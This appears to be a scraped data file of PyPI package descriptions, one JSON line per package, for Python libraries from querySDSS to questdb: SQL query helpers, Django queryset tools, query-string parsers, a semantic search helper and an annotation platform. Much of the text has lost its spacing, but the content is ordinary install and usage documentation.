values.RequirementsPython 3.xAstroqueryAstropyYou can install the required packages using the following command:pipinstallastroqueryastropyHow to InstallClone this repository to your local machine using the following command:gitclonehttps://github.com/aCosmicDebbuger/querySDSS.gitcdquerySDSSor you can use pippipinstallquerySDSSUsage:Just opena a terminal where the file is located and runpython3querySDSS.pyor if you need to import it:fromquerySDSS.querySDSS.querySDSSimportquery_sdss_dataa=query_sdss_data(num_observations=3000)print(a)You\u2019ll get a table of SDSS data."} +{"package": "query-segmenter", "pacakge-description": "query-segmenterQuery Segmentation for search"} +{"package": "query-selector", "pacakge-description": "Query selector allows one treat a file full of SQL queries as a record, with\none attribute for each annotated query. This makes working with long, ad-hoc\nSQL queries more hygienic, and has the benefit of making it easy to find the\nqueries.TheQuerySelectorconstructor accepts a string, file handle or(, . Theis any Python compatible name; it will\nbecome an attribute of the object. Theis merely metadata, and can\nbe omitted; it describes whether a query should have one, none or many\nresults.For example, a file like this:--@ t oneSELECTnow();becomes an object with a single attributet:>>>q.tQuery(args=[], mode=u'one', readonly=False, text=u'SELECT * FROM now();')AQuerySelectorobject is iterable, providing pairs of name and query in\nthe order that the queries originally appeared in the file.>>>forname,qinqs:...print'%s:%s'%(name,q)t: Query(args=[], mode=u'one', readonly=True, text='SELECT now();')The Query ConventionIf you have a scripttask.pyand a SQL filetask.sql, or a module in a\npackagepackage/module.pyand a SQL filepackage/module.sql, QuerySelector\nhas a shortcut for you:fromquery_selector.magicimportqueriesforqinqueries:printqThemagicmodule overrides the normal module loading machinery to\ndetermine which script or module is importing it and locate an adjacent SQL\nfile. This magic is in a separate module to make it stricly opt-in!ModesModes can be one ofnone,one,one?andmany. When not\nspecified, default ismany. A mode string can also be followed with the\nsingle wordroas a clue that the query is read-only.Realistically,SELECT now()is a read-only query. We can annotate it as\nsuch, the resulting query datastructure records this:>>>QuerySelector(\"\"\"...--@ t one ro...SELECT now();...\"\"\").tQuery(args=[], mode=u'one', readonly=True, text=u'SELECT * FROM now();')Parametersquery-selectorrecognizes the%(...)sstyle parameter references\ndefined in Python DBI 2.0. Say that we\u2019d like to pass a timezone\nwhen selecting the server time. We can do so by addingAT TIME ZONE %(tz)sto our query. The presence of this parameter is stored in theargsfield\nof the parsed result. (The parameters in.argsare listed in the order of\ntheir first appearance in the query.)>>>QuerySelector(\"\"\"...--@ t one ro...SELECT now() AT TIME ZONE%(tz)sAS t;...\"\"\").tQuery(args=[u'tz'], mode=u'one', readonly=True,\n text=u'SELECT now() AT TIME ZONE %(tz)s AS t;')"} +{"package": "queryset-annotations", "pacakge-description": "django_queryset_annotationsThedjango_queryset_annotationslibrary provides a way to add annotations to Django querysets. Annotations are additional fields that are calculated on the fly and added to the queryset results. This can be particularly useful when you want to add computed fields to your models without having to modify the underlying database schema.InstallationYou can installdjango_queryset_annotationsvia pip:pipinstallqueryset-annotationsUsageTo use thedjango_queryset_annotationslibrary, you first need to create an annotation class. An annotation class is a subclass of theBaseAnnotationclass. TheBaseAnnotationclass provides a number of methods that you can use to define the annotation, such as thename,output_field, andget_expression()methods.ExampleConsider the following models:fromdjango.dbimportmodelsclassBook(models.Model):title=models.CharField(max_length=100)author=models.ForeignKey(\"Author\",on_delete=models.CASCADE,related_name=\"books\")classAuthor(models.Model):name=models.CharField(max_length=100)age=models.IntegerField()You can create an annotation class to count the number of books for each author:fromdjango.dbimportmodelsfromqueryset_annotations.baseimportBaseAnnotationclassBookCountAnnotation(BaseAnnotation):name=\"book_count\"output_field=models.IntegerField()defget_expression(self):returnmodels.Count(\"books\",distinct=True)Then, create a proxy model for theAuthormodel:fromqueryset_annotations.proxy.modelimportBaseProxyModelclassAuthorProxyModel(BaseProxyModel):book_count=BookCountAnnotation()classMeta:model=AuthorYou can now use this proxy model in your serializers and viewsets:fromrest_frameworkimportserializersfromrest_framework.viewsetsimportModelViewSetclassAuthorSerializer(serializers.ModelSerializer):classMeta:model=AuthorProxyModelfields=\"__all__\"classBookSerializer(serializers.ModelSerializer):classMeta:model=Bookfields=\"__all__\"classAuthorViewSet(ModelViewSet):queryset=AuthorProxyModel.objects.all()serializer_class=AuthorSerializerclassBookViewSet(ModelViewSet):queryset=Book.objects.all()serializer_class=BookSerializerWith this setup, when you retrieve an author from the API, you will also get the count of books they have written.Advanced UsageThedjango_queryset_annotationslibrary also provides aBaseContextManagerand anAnnotatedQuerysetMixinfor more advanced use cases. TheBaseContextManagercan be used to manage the context of the annotation, and theAnnotatedQuerysetMixincan be used to automatically annotate the queryset in a viewset.Here is an example of how to use these features:fromdjango.dbimportmodelsfromrest_frameworkimportserializersfromrest_framework.viewsetsimportModelViewSetfromannotation.modelsimportAuthor,Bookfromqueryset_annotations.baseimportBaseAnnotation,BaseContextManagerfromqueryset_annotations.drf.viewsimportAnnotatedQuerysetMixinfromqueryset_annotations.proxy.modelimportBaseProxyModelclassBookCountAnnotation(BaseAnnotation):name=\"book_count\"output_field=models.IntegerField()defget_expression(self,*,context_manager:BaseContextManager=None):returnmodels.Count(\"books\",distinct=True)classAuthorProxyModel(BaseProxyModel):book_count=BookCountAnnotation()classMeta:model=AuthorclassAuthorSerializer(serializers.ModelSerializer):user=serializers.HiddenField(default=serializers.CurrentUserDefault())classMeta:model=AuthorProxyModelfields=\"__all__\"classBookSerializer(serializers.ModelSerializer):classMeta:model=Bookfields=\"__all__\"classAuthorViewSet(AnnotatedQuerysetMixin,ModelViewSet):annotation_context_class=BaseContextManagerannotated_model=AuthorProxyModelserializer_class=AuthorSerializerdefget_queryset(self):context_manager=self.annotation_context_class(self.get_serializer_context())returnself.queryset.get_annotated_queryset(context_manager=context_manager)classBookViewSet(ModelViewSet):queryset=Book.objects.all()serializer_class=BookSerializerIn this example, theAuthorViewSetuses theAnnotatedQuerysetMixinand aBaseContextManagerto automatically annotate the queryset with the book count.ConclusionThedjango_queryset_annotationslibrary provides a powerful and flexible way to add computed fields to your Django models. Whether you need to add simple counts or more complex calculations, this library can help you keep your code clean and maintainable."} +{"package": "queryset-reporter", "pacakge-description": "Django Queryset ReporterDescriptionA django pluggable admin-site app for create persisted queryset's and make reports based on them, in various forms of data like cvs's, xlsx's.Project URL:https://github.com/ricardodani/django-queryset-reporter/InstallType:pipinstallqueryset_reporterIn yoursettingsadd:INSTALLED_APPS=[# ...'queryset_reporter',]Migrate `queryset_reporter`` models:./manage.pymigrateAdd url's definitions to yourproject.urlsmodule:path('path-of-choice/',include('queryset_reporter.urls')),PermissionsYou should addqueryset_reporter.can_use_reportsto regular users that you want to access the report view/creation page.Example project credentialsIn order to test the project, there's a Example project with a pre defined database that you can use right away.\nHere's the credentials:Admin user:User: admin - Pass: 123Common user:User: tester - Pass: asdfghjkl\u00e7Tested ondjango == 2.2.xpython == 3.7.xAboutAuthor: Ricardo DaniE-mail:ricardodani@gmail.comGithub: github.com/ricardodaniLicenseMIT"} +{"package": "queryset-serializer", "pacakge-description": "QuerysetSerializerThis package adds a serializer to ensure all models in the serializers get properly prefetched or selectedinstallationpip install queryset-serializerUsageSimply install the package into your project and import the serializerfromqueryset_serializerimportQuerySetSerializerclassMyModelSerializer(QuerySetSerializer):...classMeta:...In order to prefetch/select everything make sure all serializers used are of QuerySetSerializerNote : You cannot mixrestframework.serializer.ModelSerializerwith this class\n(However all instance of ModelSerializer should be replaceable)Configconfigurations can be changed as following:fromqueryset_serializer.serializersimportConfigConfig.meta_class.{setting}={new_value}these are the relevant settings :prefetch_to_attr_prefix , What string will be used as prefix.prefetch_listing , How the prefetch is done (Options: PrefetchToAttrSerializerList, PrefetchSerializerList)prefetch_listingthere are 2 options for the prefetch_listing. (Located inqueryset_serializer.serializers.model)PrefetchToAttrSerializerListwill prefetch/select relations and use theto_attrattribute of thePrefetchclassPrefetchSerializerListwill only prefetch/select relationsThis package by default makes use PrefetchToAttrSerializerList,\nThe benefit of this is that the.all()calls on the relations are nog longer lazy.This can significantly speed up performance especially on a queryset with a large amount of results or\nif there are a lot of child (queryset)serializerThis can also be turned off, and instead do a regular prefetch:fromqueryset_serializer.serializersimportConfigfromqueryset_serializer.serializers.modelimportPrefetchSerializerListConfig.meta_class.prefetch_listing=PrefetchSerializerList"} +{"package": "querysource", "pacakge-description": "QuerySourceQuerySource is a powerful Python library designed to streamline access to multiple databases and external APIs through a single, unified interface. Utilizing the proxy design pattern, QuerySource allows developers to seamlessly integrate various data sources into their projects without worrying about the complexities of managing multiple connections.FeaturesUnified interface for querying multiple databases (Redis, PostgreSQL, MySQL, Oracle, SQL Server, InfluxDB, CouchDB, Druid)Support for external APIs (Salesforce, ShopperTrack, ZipCodeAPI, etc.)Easy-to-use API for executing queriesExtensible design, allowing for easy addition of new data sourcesInstallation$pipinstallquerysource---> 100%Successfully installed querysourceRequirementsPython >= 3.9asyncio (https://pypi.python.org/pypi/asyncio/)Basic UsageQuerySource can be used in several ways, one is using QS object itself:fromquerysource.queries.qsimportQSquery=QS(query='SELECT * FROM tests',output_format='pandas')result,error=awaitquery.query()Extending QuerySourceTo add support for a new data source, create a new class inheriting from the BaseProvider or BaseAPI class and implement the required methods (prepare_connection, query, close). Then, register the new data source in the QuerySource class by adding it to the appropriate dictionary (_supported_databases or _supported_apis).ContributingWe welcome contributions to QuerySource! If you'd like to contribute, please follow these steps:Fork the repositoryCreate a new branch for your feature or bugfixImplement your changesAdd tests covering your changesCreate a pull request against the original repositoryContribution guidelinesWriting testsCode reviewOther guidelinesLicenseQuerySource is released under the BSD License. See the LICENSE file for more details."} +{"package": "querystar", "pacakge-description": "\ud83d\udc4b Hi there, this isQueryStarPython-First Solution to Develop BotsQueryStar lets you easily set up triggers and actions to automate workflows.Something likeSaving Slack new messages that must contain 'hello' to a Google sheetcan be easily done:# bot.pyimportquerystarasqsdata=qs.triggers.slack.new_message(channel_id='MyChannelID',trigger_string='hello')qs.actions.slack.new_message(spreadsheet_id='MySheetID',worksheet_id='Sheet1',data=[[data['user'],data['text']]])QueryStar can help you:automate workflowsdevelop Slack botsintegrate SaaS data to your own appsrun background jobsschedule tasks...Get StartedInstallationpip install querystarSetup Slack (or other apps) ConnectionThis step takes 3-5 mins:Crete a free account atquerystar.ioAdd any SaaS tools that you want to automate in your QueryStar workspace. (Head over toquickstartin our docs for instructions.)Get a QueryStar token. (Instruction)Add the token as an environment variable on your dev machine.[!IMPORTANT]\nYour Data is Safe on QueryStar backend:\nQueryStar takes care of 3rd party API integration. It only monitors trigger events and passes action data back to the apps of your choice. Your data isNOTstored or logged in any form or capacity. Please seePrivacy Policyfor more details.Build and Run a BotCreate a new fileapp.pyand add this code:# app.pyimportquerystarasqsmessage=qs.triggers.slack.new_message(channel_id='MyChannelID')print(message)Add QueryStar app to your Slack channel, and copy the channel ID (Instruction)ReplaceMyChannelIDwith the channel id.Run the bot:$querystarrunapp.pyGet InspiredBecause you use Python, there's much more you can build.A LLM-powered (Large Language Model) Slack bot:tutorial."} +{"package": "querystream", "pacakge-description": "UNKNOWN"} +{"package": "querystring", "pacakge-description": "This repo is a port of thenode.js querystring module.It contains two methods,parse_qsandstringify_objthat are functionally equivalent to thequerystring.parseandquerystring.stringifynode counterparts. It also contains defaultencode_uri_componentanddecode_uri_componentfunctions that can be used for convenience.Installationpip install querystringUsageParsing a query string>>> querystring.parse_qs('foo=bar&baz=qux&baz=quux&corge=')\n{u'foo': u'bar', u'baz': [u'qux', u'quux'], u'corge': u''}>>> querystring.parse_qs('foo:bar;baz:qux;baz:quux;corge:', sep=';', eq=':')\n{u'foo': u'bar', u'baz': [u'qux', u'quux'], u'corge': u''}>>> def gbk_decode(s):\n... return urllib.unquote(s)\n...\n>>> querystring.parse_qs('foo=bar&w=%D6%D0%CE%C4', decode_fn=gbk_decode)\n{'foo': 'bar', 'w': '\\xd6\\xd0\\xce\\xc4'} # u'\u4e2d\u6587'Converting an object back into a query string>>> querystring.stringify_obj({'foo': 'bar', 'baz': ['qux', 'quux'], 'corge': ''})\n'foo=bar&baz=qux&baz=quux&corge='>>> querystring.stringify_obj({'foo': 'bar', 'baz': ['qux', 'quux'], 'corge': ''}, sep=';', eq=':')\n'foo:bar;baz:qux;baz:quux;corge:'>>> def gbk_encode(s):\n... return urllib.quote(unicode(s).encode('gbk'))\n...\n>>> querystring.stringify_obj({'foo': 'bar', 'w': u'\u4e2d\u6587'}, encode_fn=gbk_encode)\n'foo=bar&w=%D6%D0%CE%C4'MotivationWe were looking for a simple module to parse query parameters in a sensible way,\nand were unsatisfied by howurlparsehandled params (putting all values in a list),\nso we made this.LicenseCopyright Refinery29, Inc.Permission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the\n\u201cSoftware\u201d), to deal in the Software without restriction, including\nwithout limitation the rights to use, copy, modify, merge, publish,\ndistribute, sublicense, and/or sell copies of the Software, and to permit\npersons to whom the Software is furnished to do so, subject to the\nfollowing conditions:The above copyright notice and this permission notice shall be included\nin all copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN\nNO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\nOTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE\nUSE OR OTHER DEALINGS IN THE SOFTWARE."} +{"package": "query-string", "pacakge-description": "Installation$[sudo]pipinstallquery-stringFeaturesPython 2/3 compatibleExamples>>>importquery_string>>>query_string.parse('https://site.org/index.php?k=v&k2=v2&k3=v3#anchor'){'k':'v','k2':'v2','k3':'v3'}>>>query_string.parse('k=v&k2=v2&k3=v3'){'k':'v','k2':'v2','k3':'v3'}LinksQuery string - Wikipediareadme42.com"} +{"package": "querystringer", "pacakge-description": "QueryStringerSimple middleware for django to extract string queries from urlsInstallationpip install querystringerImportimport it inside middleware in django settingsmiddlewares = [\n ...,\n 'querystringer.middleware.QueryStringer',\n ...,\n]Usageall requests will have an edited request dict\nand you can access them byrequest.GET['queries']Exampleour viewdef home(request):\n return HttpResponse(request.GET['queries'])then send request to/home?test=truenow we should except output like this('test', 'true')Remove specific charactersin yoursettings.pyadd a list withQUERY_REMOVE_STRINGSname\nto ignore characters you want\nlike thisQUERY_REMOVE_STRINGS = ['-', '>', '%']then the data you get will be clean\nlike this\nrequest to/home?test=tru>ethen we get(test, true)"} +{"package": "querystring-parser", "pacakge-description": "No description available on PyPI."} +{"package": "querystringsafe-base64", "pacakge-description": "Query string safe Base64Encoding and decoding arbitrary strings into strings that are safe to put into a URL query param.The problemurlsafe_b64encodeandurlsafe_b64decodefrom base64 are not enough because they leave=used for padding chars unquoted:importbase64base64.urlsafe_b64encode('a')'YQ=='And there are 2 problems with that=sign gets quoted:importurlliburllib.quote('=')'%3D'Some libraries tolerate the=in query string values:fromurlparseimporturlsplit,parse_qsparse_qs(urlsplit('http://aaa.com/asa?q=AAAA=BBBB=CCCC').query){'q':['AAAA=BBBB=CCCC']}but the RFC 3986 underspecifies the query string so we cannot rely on=chars being handled by all web applications as it is done by urlparse.Therefore we consider chars:[\u2018+\u2019, \u2018/\u2019, \u2018=\u2019]unsafe and we replace them with[\u2018-\u2019, \u2018_\u2019, \u2018.\u2019].\nCharacters+and/are already handled byurlsafe_*functions from base64 so only=is left.\nSince the=is used exclusively for padding, we simply remove it, and re-attach the padding during decoding.\nBecause of that,querystringsafe_base64is able to decode padded and unpadded string.The solutionimportquerystringsafe_base64querystringsafe_base64.encode(b'foo-bar')b'Zm9vLWJhcg'querystringsafe_base64.decode(b'Zm9vLWJhcg..')b'foo-bar'querystringsafe_base64.decode(b'Zm9vLWJhcg')b'foo-bar'CHANGELOG1.2.0Remove padding characters from encoded string.1.1.1Fixed packaging1.1.0Always expect bytesAdd type annotations1.0.0support for restore missing padding during decode process0.2.0Support for python30.1.5Move querystringsafe_base64 module to the rootUse install instead of develop during tests0.1.4Remove bdist_wheel from distributons0.1.3Install pandoc (travis)0.1.2Add setup.cfg and pypandoc to tests0.1.1add MANIFEST.in file0.1.0package structuretests"} +{"package": "query-strings-parser", "pacakge-description": "No description available on PyPI."} +{"package": "querystruct", "pacakge-description": "No description available on PyPI."} +{"package": "queryswap", "pacakge-description": "qsAccepts urls from a filename and, for each query parameter, replace the value\nwith a specified value.UsageExample input file:~ % cat urls.txt\nhttps://www.evildojo.com/index.php?q=search&name=darkmage\nhttps://www.evildojo.com/index.php?q=search\nhttps://www.evildojo.com/index.php\nhttps://www.evildojo.comExample usage:python3 -m qs urls.txt d3v\nhttps://www.evildojo.com/index.php?q=d3v\nhttps://www.evildojo.com/index.php?q=d3v&name=darkmage\nhttps://www.evildojo.com/index.php?q=search&name=d3v"} +{"package": "querytograph", "pacakge-description": "QueryToGraphQueryToGraph is a Python library that allows user to use simple English to create graph from a dataframe or csv file. It uses ChatGPT as the underlying engine.For security's sake, it does not send the raw data to ChatGPTbut only the data schema (i.e. the data field names) is sent.InstallationYou can install QueryToGraph using pip:pipinstallquerytographSorry I have only tested this library in Linux.UsageYou need to have an paid OpenAI account and you need to set your OpenAI API Key in your environment variable. You can set it in the terminal:exportOPENAI_API_KEY=\"put your key here, don't copy this line as it is!\"Alternatively, you could do this from inside your Jupyter notebook or Python script:import\nos.environ[\"OPENAI_API_KEY\"=\"put your key here, don't copy this line as it is!\"To use QueryToGraph, in your Jupyter notebook or Python script:importquerytographqtg=querytograph.QueryToGraph()qtg.run_gr()Go to your browser and use it, e.g.http://127.0.0.1:7861There are 3 textboxes which you have to key inQueryQuestion by the user, which will be used to generate the graph\nExample: \"show me the highest and lowest closing price for each month\"Data FolderFolder which contains Pandas dataframes in csv or pkl (pickle)Table NameFilename of the dataframe that the user wants to query on.\nDo not require the exact nameContributingContributions are welcome! Please contact me atfranziss@gmail.comThis was hack over a weekend and I am sure there are bounds to have bugs... sorry.. =)LicenseThis project is licensed under the MIT License - see the LICENSE file for details.Contactfranziss@gmail.com"} +{"package": "query-toolkits", "pacakge-description": "No description available on PyPI."} +{"package": "querytools", "pacakge-description": "DatatoolsQuerying databases for humans. And databases."} +{"package": "querytree", "pacakge-description": "QueryTreeQueryTree is a python data structure that lets you quickly access deeply nested data and load/save it in any major format.With QueryTree, you don't have to check for the esistance of (or create) any intermediate nodes.json_str=\"\"\"{\"foo\": {\"bar\": [{\"baz\": {\"n\": 1}},{\"baz\": {\"n\": 1},\"buz\": {\"k\": 2}}]}}\"\"\"tree=Tree.parse_json(json_str)print(tree['foo.bar.0.baz.n'])# 1print(tree['foo.bar.1.buz.k'])# 2# accessing nonexistant locations isn't a problemprint(tree['foo.bar.0.buz.k'])# Noneprint(tree['something.else'])# None# assign valuestree['foo.bar.0.baz.n']=99tree['foo.foo']={\"myvalue\":\"a value\"}# save as any formatprint(tree.to_yaml())Outputs:foo:bar:-baz:n:99-baz:n:1buz:k:2foo:myvalue:a value"} +{"package": "querytyper", "pacakge-description": "QuerytyperQuerytyper is a Python package to query MongoDB using a fully typed syntax.\nIt leverages the Pydantic library for defining and validating data models, providing a seamless and type-safe experience.FeaturesConstruct MongoDB queries using Python's native syntax with type hints.Leverage Pydantic models to define your MongoDB document structure and query filters efficiently.Build complex queries using logical operators and comparisons in a natural and expressive way.UsingTo add and install this package as a dependency of your project, runpoetry add querytyper.A simple example:frompydanticimportBaseModel,EmailStrfromquerytyperimportMongoFilterMeta,MongoQueryclassUser(BaseModel):\"\"\"User database model.\"\"\"id:intname:strage:intemail:EmailStrclassUserFilter(User,metaclass=MongoFilterMeta):\"\"\"User query filter.\"\"\"query=MongoQuery((UserFilter.name==\"John\")&(UserFilter.age>=10)&(UserFilter.emailin[\"john@example.com\",\"john@gmail.com\",]))print(query){\"name\":\"John\",\"age\":{\"$gte\":10},\"email\":[\"john@example.com\",\"john@gmail.com\",],}ContributingPrerequisites1. Set up Git to use SSHGenerate an SSH keyandadd the SSH key to your GitHub account.Configure SSH to automatically load your SSH keys:cat<< EOF >> ~/.ssh/configHost *AddKeysToAgent yesIgnoreUnknown UseKeychainUseKeychain yesEOF2. Install DockerInstall Docker Desktop.EnableUse Docker Compose V2in Docker Desktop's preferences window.Linux only:Export your user's user id and group id so thatfiles created in the Dev Container are owned by your user:cat<< EOF >> ~/.bashrcexport UID=$(id --user)export GID=$(id --group)EOF3. Install VS Code or PyCharmInstall VS CodeandVS Code's Dev Containers extension. Alternatively, installPyCharm.Optional:install aNerd Fontsuch asFiraCode Nerd Fontandconfigure VS Codeorconfigure PyCharmto use it.Development environmentsThe following development environments are supported:\u2b50\ufe0fGitHub Codespaces: click onCodeand selectCreate codespaceto start a Dev Container withGitHub Codespaces.\u2b50\ufe0fDev Container (with container volume): click onOpen in Dev Containersto clone this repository in a container volume and create a Dev Container with VS Code.Dev Container: clone this repository, open it with VS Code, and runCtrl/\u2318+\u21e7+P\u2192Dev Containers: Reopen in Container.PyCharm: clone this repository, open it with PyCharm, andconfigure Docker Compose as a remote interpreterwith thedevservice.Terminal: clone this repository, open it with your terminal, and rundocker compose up --detach devto start a Dev Container in the background, and then rundocker compose exec dev zshto open a shell prompt in the Dev Container.DevelopingThis project follows theConventional Commitsstandard to automateSemantic VersioningandKeep A ChangelogwithCommitizen.Runpoefrom within the development environment to print a list ofPoe the Poettasks available to run on this project.Runpoetry add {package}from within the development environment to install a run time dependency and add it topyproject.tomlandpoetry.lock. Add--group testor--group devto install a CI or development dependency, respectively.Runpoetry updatefrom within the development environment to upgrade all dependencies to the latest versions allowed bypyproject.toml.Runcz bumpto bump the package's version, update theCHANGELOG.md, and create a git tag."} +{"package": "query-understanding", "pacakge-description": "No description available on PyPI."} +{"package": "queryverse", "pacakge-description": "Queryverse LibraryQueryverse is a very lightweight prompting Python libraryInstallationYou can install queryverse using pip:pip install queryverseBuild Tooltool name:PDMminimum version: python 3.9"} +{"package": "query-wizard-features-reader", "pacakge-description": "This is a security placeholder package.\nIf you want to claim this name for legitimate purposes,\nplease contact us atsecurity@yandex-team.ruorpypi-security@yandex-team.ru"} +{"package": "query-write", "pacakge-description": "No description available on PyPI."} +{"package": "queryzpythonfirsttestlol", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quesadiya", "pacakge-description": "Quesdadiyais a data annotation project management platform where you can manage a\nproject throughCommand Line Interface (CLI)and annotate data onWeb GUIto generate a triplet data set for developing Siamese models.QuickstartInstallationYou can installquesadiyaby running$pipinstallquesadiyaCheck installation by$quesadiyaInstallation from Sourcegit clonethis repo.cd quesadiya.runpip install ..check installation by runningquesadiyaon your terminal.Project ManagementQuesadiya provides the command-line interface (CLI) to manage data annotation projects.Create ProjectYou can create a data annotation project by$quesadiyacreate[OPTIONS]For example,$quesadiyacreatequesomedata/sample_triplets.jsonlLoadinginputdata:5row[00:00,1495.40row/s]Adminpassword:Repeatforconfirmation:Insertingdata.Thismaytakeawhile...Finishcreatinganewproject'queso'Caution:must be a jsonline file, where each row must follow the format below:{\"anchor_sample_id\":\"string (max 100 char)\",\"anchor_sample_text\":\"list of text\",// each element is a paragraph\"anchor_sample_title\":\"text (nullable)\",\"candidate_group_id\":\"string (max 100 char)\",\"candidates\":[\"item\":{\"candidate_sample_id\":\"string (max 100 char)\",\"candidate_sample_text\":\"list of text\",// each element is a paragraph\"candidate_sample_title\":\"text (nullable)\"}]}anchoris the sample you want to compare to the positive sample and the negative sample.candidatesis a list of candidates for a positive and a negative sample. The sample collaborator\nselects is recorded as a positive sample andquesadiyachooses a negative sample from the rest.Tips: You can add collaborators from a jsonline file when you create a project by$quesadiyacreatequesomedata/triplets.jsonl-adata/sample_collaborators1.jsonlYou can view sample datahere.Note thatmust be a jsonline file, where each row must follow the format below:{'name':\"string (max 150 char)\",'password':\"string (max 128 char)\",'contact':\"string (max 254 char)\"}SeeCommand Line Interface Guidefor more details.Run ProjectYou can annotate a data set by running quesadiya:$quesadiyarun[OPTION]You can specify the port number to run the quesadiya server by option. For example,$quesadiyarun-p4000Quesadiya\u2019s default port number is1133.Once you run a project, open your browser and accesshttp://localhost:1133/.Then, select a project and type admin name and password.This leads you to the admin page. In the admin page, you can do the followings:view discarded samplesview progress of each collaboratoredit collaboratorsTips: Admin user cannot annotate data. If you\u2019re the admin and like to annotate\nsamples, make a collaborator account for yourself and login with the account.SeeAdmin Guidefor more details.Data AnnotationData annotation is very simple and intuitive in Quesadiya.Anchor textis shown\non the left hand side of the screen andCandidatesare on the right. Collaborators\ncan eitherselectpositive sample among candidates ordiscarda sample if the sample is corrupted for some reason.\nAdmin can view discarded samples and push a sample back to the project in the admin page.Export DataYou can export a snapshot of annotated data set by$quesadiyaexportThe output path must be a jsonline file. Each row follows the format below:{\"anchor_sample_id\":\"text\",\"positive_sample_id\":\"text\",\"negative_sample_id\":\"text\"}Note that this operation requires the admin privilege.The operation above only generates a triplet data set with samples ids.\nIf you\u2019d like to include text for each sample, add-ioption. For example,$quesadiyaexportquesodata.jsonl-iThis will generate a jsonline file, where each row follows:{\"anchor_sample_id\":\"text\",\"positive_sample_id\":\"text\",\"negative_sample_id\":\"text\",\"anchor_sample_text\":\"list of text\"// each element is a paragraph,\"positive_sample_text\":\"list of text\",\"negative_sample_text\":\"list of text\"}SecurityA disclaimer: Quesadiya and its contributors take no responsibility for protecting your data.That said, we encrypt all passwords usingargon2.If you\u2019d like to prohibit any other user on your environment from accessing your data, we encourage you to change the accessibility of\nproject folder. You can see the path to the quesadiya root by$quesadiyapathThis command shows the absolute path to quesadiya project folder.\nGo to the directory, and you\u2019ll find your project folder."} +{"package": "quesans", "pacakge-description": "QuestionAnswering : Qur'an Question Answering with TransformersTransformers based approach for question answering in Qur'an which employs transfer-learning, ensemble-learning across multiple models.InstallationYou first need to install Java for the evaluation script which usesfarasapyand the desired version is Java8.\nPlease referOracle installation guidefor more details on installing JDK for different platforms.Then you need to install PyTorch. The recommended PyTorch version is 1.11.0\nPlease refer toPyTorch installation pagefor more details specifically for the platforms.When PyTorch has been installed, you can install requirements from source by cloning the repository and running:gitclonehttps://github.com/DamithDR/QuestionAnswering.gitcdQuestionAnswering\npipinstall-rrequirements.txtExperiment ResultsYou can easily run experiments using following command and altering the parameters as you wishpython-mexamples.arabic.quran.quran_question_answering--n_fold=1--transfer_learning=False--self_ensemble=False--models=camelmix,arabertParametersPlease find the detailed descriptions of the parametersn_fold : Number of executions expected before self ensemble\ntransfer_learning : On/Off transfer learning\nself_ensemble : On/Off self ensembling\nmodels : comma seperated model tagsModel Tagsarabert : aubmindlab/bert-base-arabertv2\nmbertcased : bert-base-multilingual-cased\nmbertuncased : bert-base-multilingual-uncased\ncamelmix : CAMeL-Lab/bert-base-arabic-camelbert-mix\ncamelca : CAMeL-Lab/bert-base-arabic-camelbert-ca\naraelectradisc : aubmindlab/araelectra-base-discriminator\naraelectragen : aubmindlab/araelectra-base-generator"} +{"package": "quese", "pacakge-description": "QUESE\"Quese\" allows you implement in an easy way a Search Algoritm, based on Embeddings and Semantic Similarity, in your Python apps.\nThe module provides a function called search_by_embeddings(), with several params to customize the searching process.INSTALLATIONYou can install \"quese\" with pip:pipinstallqueseEXAMPLE WITH BYfrom quese import search_by_embeddings\n\ndata_ = [\n {\n \"title\": \"UX Designer\",\n \"tags\": \"Designer\"\n },\n {\n \"title\": \"Senior Accounter\",\n \"tags\": \"Accounter\" \n },\n {\n \"title\": \"Product Manager\",\n \"tags\": \"Managment\" \n }\n]\n\nresults = search_by_embeddings(data=data_, query=\"Manager\", by=\"title\")\n#Results will return a LIST with the dictionaries whose title is Semantically Similar to the query: \"Manager\", so in this case, the last dictionary: \"Product Manager\".\nprint(results)PARAMSdata:It's the first param, it'sREQUIRED, and it must be alist of dictionaries.query:It's the second param, it'sREQUIREDas well, and it represent the query you want to pass.Type:stringby:It's the third param, it'sonly REQUIRED if you don't pass the \"template\" param, and it represent the value of your dictionaries that you are searching for.For example, if you want to search in a list of products, your \"by\" param could be the prop \"name\" of each product.Type:stringtemplate:It'sonly REQUIRED if you don't pass the \"by\" param, and it's similar to \"by\", but allow you to search by a customized string for each dictionary in your data list.For example, if you want to search in a list of products, your \"template\" param could be a string like this: \"{name}, seller: {seller}\".\nNotice that you have to define your propsbetween \"{}\", as you can see in the example with the variables\"name\"and\"seller\".Type:stringaccuracy:It'soptional, and it represents the similarity that the dictionary must have with the query to be considered a result.The default value is 0.4, wich works good with almost all the models. However, if you want to change it, we don't recommend to set vary high values or very low values, the range0.3-0.6should be enought.Type:float number between 0-1model:It'soptional, and it represents theembedding modelyou want to use.The default model is'sentence-transformers/all-MiniLM-L6-v2'. You can use an other model like 'sentence-transformers/all-mpnet-base-v2', but take care becauseif the model don't work with sentence-transformers this package will not work with it.Type:stringEXAMPLE WITH TEMPLATEfrom quese import search_by_embeddings\n\ndata_ = [\n {\n \"title\": \"UX Designer\",\n \"tags\": \"Designer\"\n },\n {\n \"title\": \"Senior Accounter\",\n \"tags\": \"Accounter\" \n },\n {\n \"title\": \"Product Manager\",\n \"tags\": \"Managment\" \n }\n]\n\nresults = search_by_embeddings(data=data_, query=\"Manager\", template=\"{title}, {tags}\")\n#Results will return a LIST with the dictionaries whose title and tags are Semantically Similar to the query: \"Manager\", so in this case, the last dictionary: \"Product Manager\".\nprint(results)"} +{"package": "queso", "pacakge-description": "DEPRECATEDQueso is no longer maintained. Please useBocadillo CLIinstead."} +{"package": "questdb", "pacakge-description": "This library makes it easy to insert data intoQuestDB.This client library implements QuestDB\u2019s variant of theInfluxDB Line Protocol(ILP) over TCP.ILP provides the fastest way to insert data into QuestDB.This implementation supportsauthenticationand 